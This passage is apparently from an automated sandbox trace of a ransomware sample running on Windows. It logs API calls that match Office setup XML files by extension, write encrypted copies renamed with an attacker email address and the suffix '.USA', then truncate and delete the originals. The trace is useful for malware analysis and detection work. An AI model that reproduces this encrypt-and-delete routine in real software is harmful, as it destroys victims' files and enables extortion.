lpString2="XML") returned -1 [0041.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.340] lstrlenW (lpString=".dbf") returned 4 [0041.340] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.340] lstrlenW (lpString=".1cd") returned 4 [0041.340] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.340] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML") returned 112 [0041.340] lstrlenW (lpString=".jpg") returned 4 [0041.340] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.340] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.340] lstrlenW (lpString="SETUP.XML") returned 9 [0041.340] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.341] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1608) returned 1 [0041.341] CloseHandle (hObject=0x1b8) returned 1 [0041.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 0x20 [0041.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.341] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.341] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.341] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0041.342] GetLastError () returned 0x0 [0041.342] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x648, lpOverlapped=0x0) returned 1 [0041.343] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x650, lpOverlapped=0x0) returned 1 [0041.344] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.344] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.344] SetEndOfFile (hFile=0x1c8) returned 1 [0041.344] CloseHandle (hObject=0x1c8) returned 1 [0041.345] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.345] SetEndOfFile (hFile=0x1b8) returned 1 [0041.345] CloseHandle (hObject=0x1b8) returned 1 [0041.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.346] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1 [0041.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.346] lstrlenW (lpString=".doc") returned 4 [0041.346] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.346] lstrlenW (lpString=".docx") returned 5 [0041.346] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.346] lstrlenW (lpString=".pdf") returned 4 [0041.346] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.346] lstrlenW (lpString=".xls") returned 4 [0041.346] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.346] lstrlenW (lpString=".xlsx") returned 5 [0041.346] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.346] lstrlenW (lpString=".ppt") returned 4 [0041.346] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.346] lstrlenW (lpString=".zip") returned 4 [0041.346] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.346] lstrlenW (lpString=".rar") returned 4 [0041.346] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.346] lstrlenW (lpString=".bz2") returned 4 [0041.346] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString=".7z") returned 3 [0041.347] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.347] lstrlenW (lpString=".dbf") returned 4 [0041.347] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.347] lstrlenW (lpString=".1cd") returned 4 [0041.347] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.347] lstrlenW (lpString=".jpg") returned 4 [0041.347] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.347] lstrlenW (lpString=".doc") returned 4 [0041.347] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString=".docx") returned 5 [0041.347] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.347] lstrlenW (lpString=".pdf") returned 4 [0041.347] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString=".xls") returned 4 [0041.347] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString=".xlsx") returned 5 [0041.347] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.347] lstrlenW (lpString=".ppt") returned 4 [0041.347] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.347] lstrlenW (lpString=".zip") returned 4 [0041.347] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.347] lstrlenW (lpString=".rar") returned 4 [0041.347] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString=".bz2") returned 4 [0041.347] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.347] lstrlenW (lpString=".7z") returned 3 [0041.347] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.348] lstrlenW (lpString=".dbf") returned 4 [0041.348] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.348] lstrlenW (lpString=".1cd") returned 4 [0041.348] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.348] lstrlenW (lpString=".jpg") returned 4 [0041.348] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.348] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.348] lstrlenW (lpString="SETUP.XML") returned 9 [0041.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.349] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=6241) returned 1 [0041.349] CloseHandle (hObject=0x1b8) returned 1 [0041.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 0x20 [0041.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0041.349] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.349] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.349] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0041.350] GetLastError () returned 0x0 [0041.350] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1861, lpOverlapped=0x0) returned 1 [0041.353] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1870, lpOverlapped=0x0) returned 1 [0041.354] ReadFile (in: hFile=0x1b8, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.354] WriteFile (in: hFile=0x1c8, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.355] SetEndOfFile (hFile=0x1c8) returned 1 [0041.355] CloseHandle (hObject=0x1c8) returned 1 [0041.355] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.355] SetEndOfFile (hFile=0x1b8) returned 1 [0041.358] CloseHandle (hObject=0x1b8) returned 1 [0041.358] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.359] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\setup.xml")) returned 1 [0041.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.359] lstrlenW (lpString=".doc") returned 4 [0041.359] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.359] lstrlenW (lpString=".docx") returned 5 [0041.359] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.359] lstrlenW (lpString=".pdf") returned 4 [0041.359] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.359] lstrlenW (lpString=".xls") returned 4 [0041.359] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.359] lstrlenW (lpString=".xlsx") returned 5 [0041.359] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.359] lstrlenW (lpString=".ppt") returned 4 [0041.359] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.359] lstrlenW (lpString=".zip") returned 4 [0041.359] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.359] lstrlenW (lpString=".rar") returned 4 [0041.359] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.359] lstrlenW (lpString=".bz2") returned 4 [0041.359] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.359] lstrlenW (lpString=".7z") returned 3 [0041.359] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString=".dbf") returned 4 [0041.360] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString=".1cd") returned 4 [0041.360] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString=".jpg") returned 4 [0041.360] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString=".doc") returned 4 [0041.360] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString=".docx") returned 5 [0041.360] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.360] lstrlenW (lpString=".pdf") returned 4 [0041.360] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString=".xls") returned 4 [0041.360] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString=".xlsx") returned 5 [0041.360] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.360] lstrlenW (lpString=".ppt") returned 4 [0041.360] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString=".zip") returned 4 [0041.360] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.360] lstrlenW (lpString=".rar") returned 4 [0041.360] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString=".bz2") returned 4 [0041.360] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.360] lstrlenW (lpString=".7z") returned 3 [0041.360] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.360] lstrlenW (lpString=".dbf") returned 4 [0041.361] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.361] lstrlenW (lpString=".1cd") returned 4 [0041.361] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\SETUP.XML") returned 101 [0041.361] lstrlenW (lpString=".jpg") returned 4 [0041.361] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.361] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.361] lstrlenW (lpString="VisioMUI.XML") returned 12 [0041.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0041.706] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=9503) returned 1 [0041.707] CloseHandle (hObject=0x19c) returned 1 [0041.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 0x20 [0041.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0041.707] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.707] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.970] GetLastError () returned 0x0 [0041.970] ReadFile (in: hFile=0x19c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x251f, lpOverlapped=0x0) returned 1 [0041.972] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2520, lpOverlapped=0x0) returned 1 [0041.973] ReadFile (in: hFile=0x19c, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0041.973] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0041.973] SetEndOfFile (hFile=0x170) returned 1 [0041.973] CloseHandle (hObject=0x170) returned 1 [0041.974] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0041.974] SetEndOfFile (hFile=0x19c) returned 1 [0041.975] CloseHandle (hObject=0x19c) returned 1 [0041.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.975] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1 [0041.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.975] lstrlenW (lpString=".doc") returned 4 [0041.975] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.975] lstrlenW (lpString=".docx") returned 5 [0041.975] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.975] lstrlenW (lpString=".pdf") returned 4 [0041.975] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.975] lstrlenW (lpString=".xls") returned 4 [0041.975] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.975] lstrlenW (lpString=".xlsx") returned 5 [0041.975] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.975] lstrlenW (lpString=".ppt") returned 4 [0041.976] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.976] lstrlenW (lpString=".zip") returned 4 [0041.976] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.976] lstrlenW (lpString=".rar") returned 4 [0041.976] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString=".bz2") returned 4 [0041.976] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString=".7z") returned 3 [0041.976] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.976] lstrlenW (lpString=".dbf") returned 4 [0041.976] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.976] lstrlenW (lpString=".1cd") returned 4 [0041.976] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.976] lstrlenW (lpString=".jpg") returned 4 [0041.976] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0041.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 